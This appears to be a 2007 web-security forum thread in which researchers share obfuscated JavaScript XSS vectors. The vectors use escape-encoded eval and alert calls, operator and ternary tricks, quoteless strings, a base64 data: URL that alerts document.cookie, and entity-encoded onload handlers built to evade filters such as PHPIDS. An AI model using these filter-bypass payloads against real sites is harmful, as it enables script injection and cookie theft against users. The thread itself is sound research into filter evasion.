Hehe you been hacking my blog :) ?

I'll check to see what's happened, what are the symptoms?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nope, I never hack any friends site, thats the truth.

i did notice that some post did not came through, it with the htmlenties post, I was talking about htmlentities works in the PHP source. But, obviously it was gone and too lazy to type again.

For truly unreadable Javascript combine octal and unicode :D

\u0031+\u0031\u005b'\145\166\141\154'\u005d\u0028'\141\154\145\162\164\50\61\51'\u0029

which translates to FF only:-
1+1['eval']('alert(1)')

Here's the Hackvertor vector for creating it:-
<@uni>1<@/uni> + <@uni>1<@/uni><@uni>[<@/uni>'<@oct>eval<@/oct><@oct><@/oct>'<@uni>]<@/uni><@uni>(<@/uni>'<@oct>alert(1)<@/oct>'<@uni>)<@/uni>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's another one with even more code obscured including operators:-
\u0030\u005b\u0022\x65\x76\x61\x6C"\u005d\u0028\u0027\x61\x6C\x65\x72\x74\x28\x31\x29'\u0029

Hackvertor translation:-
<@uni>0<@/uni><@uni>["<@/uni><@hex>eval<@/hex>"<@uni>]<@/uni><@uni>(<@/uni><@uni>'<@/uni><@hex>alert(1)<@/hex>'<@uni>)<@/uni>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

PDP posted a awesome vector on my blog:-
0..eval('alert(1)')

I'm not sure why the double dot works, anyone any links?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

It's ok I found out what it does :) check this out:-

0/eval('alert(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

0/alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

odd!

- RSnake
Gotta love it. http://ha.ckers.org

alert(1)/alert(2) works too. Two commands for the price of one!

EDIT

Also, is this normal behavior?

alert(1)[alert(2)]



Edited 1 time(s). Last edit at 12/13/2007 09:25AM by Spyware.

Long time no haiku - had some work with the PHPIDS to do :)


emphasis
might find its way
or close all doors

{{{!!!1}}!alert\u000B(!!1)}

--alert(1)
-alert(1)
+-alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

What have I done ;)



no matter how
many zeros you add
results never vary

;;;000,000;;;with(000);;;alert(000);;;

Chained ternary operators are cool!

0?1:!1?0:0?1:1/alert(1)?1:1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Crazy but executes:-
+-0?+-1:!1?+-0:+-0?+-1:+-1/alert(1)?+-1:+-1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's why I think Javascript allows these invalid vectors.

It can't raise an error first without running the function code, so the parser has to perform the function to check the returned amount. Only when the process is complete does javascript raise an error.

These for example don't raise errors:-
function x() {
alert(1);
return 1;
}
1;1/x();+-x();~x()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/14/2007 04:02AM by Gareth Heyes.

Yep - at least spidermonkey must act that way. I noticed in several vectors that an alert was executed and after the execution the parser told me that alert wasn't defined. Weird.

<edit>
Ah and btw - someday I'd just like to have a look inside the parser sources to check how the hell it differentiates between comparision-operators, bit-operators and xml predicates...



(1<<1>>alert(2)<<1>>1)
(1<1>alert(false)<1>1)
alert(<a>alert(false)</a>)



</edit>



Edited 1 time(s). Last edit at 12/14/2007 04:34AM by .mario.

alert(1)-alert(/two/)
[-alert(1)]
[~alert(1)] --> writes -1 instead of NaN.
-Math.abs[(+alert(/boo/))]

Dunno if any of this stuff is new, what's the best way for checking whether it's new or not?



Edited 5 time(s). Last edit at 12/14/2007 05:42AM by Spyware.

The last for a couple of days...



breathe in
breathe out and rest
to solve the problem


{}(_=/./.eval,!0,0);!_(['ale'+'rt(!0)'][0])[0]

This new?

javascript:/I am:/+alert(/1234/)

Mostly just cause they look cool:

x={}
x[/\\/]=!/\\/?/\\/:alert
x[/\\/].valueOf()(1)

and a variation...

x=[]
x[{}]=!/\\/?[]:alert
x[{}].valueOf()(1)

-Dan

x=[]
x[{}]=!/\\/?{}:eval
x[/\\/]=(/:/)[-0]?{}:(/al/)[-1]
x[/\\/]+=!/\\/?{}:(/ert/)[-1]
x[{}].valueOf()(x[/\\/]+(/(1)/)[-1])

Check this! You can define strings quotelessly as so, (/string/)[-1]. Notice that the foreslashes don't turn up in the string! It was heavily inspired by Gareth's post on the previous page talking about making strings one character at a time using square brackets. And a new way to get false... (/anything/)[-2], which could be helpful for the ternary operator.

EDIT: you can even lose the parentheses. /string/[-1] will do. Single and double quotes can go between the slashes.

-Dan



Edited 1 time(s). Last edit at 12/16/2007 07:38PM by DoctorDan.

Hi,

I saw on a cheatsheet many variations of data:text and a href. But not this one.

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==">Test</a>


it works under FF: 2.0.0.10, doesn't: Opera 9.24, IE 6.0, 7.0

@guesty22: https://h4k.in/dataurl

<frameset/&apos;/onload=+1?0+&#x5C&#x75&#x30&#x30&#x36&#x31&#x5C&#x75&#x30&#x30&#x36&#x63&#x5C&#x75&#x30&#x30&#x36&#x35&#x5C&#x75&#x30&#x30&#x37&#x32&#x5C&#x75&#x30&#x30&#x37&#x34&#x5C&#x75&#x30&#x30&#x32&#x38&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x32&#x39+1:1?0:1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<image
@/src=//businessinfo.co.uk/images/logo.gif
@/onload
=
\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

\u9999=alert
\u9999(1)

\u9998=alert
\u9998(1)

\u9997=alert
\u9997(1)

and so on...
Range seems to be from \u5000 to \u9999 and is allowed as a valid Javascript variable

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 12/20/2007 03:29AM by Gareth Heyes.

That's pretty cool Gareth.

Okay, this one is a bit long and perhaps impractical, but cool nonetheless.
x={}
m=Math
s=String
x[/\\/]=!/\\/?{}:eval
x[{}]=s()
for (i=1;i<6;i++) { x[{}]+=s.fromCharCode((-23/8)*m.pow(i,4)+(421/12)*m.pow(i,3)+(-1181/8)*m.pow(i,2)+(3017/12)*i-39) }
x[/\\/].valueOf()(x[{}]+/(1)/[-1])

Behold the for loop!
-Dan



Edited 1 time(s). Last edit at 12/19/2007 07:03PM by DoctorDan.

@dan

Nice! I like the string trick [-1] mentioned earlier too :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Dan: Nice one! String.fromCharCode is just perfect for obfuscation combined with the Math object...

\u50001 \u0073\u0065\u0074ter=alert
\u50001=1

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]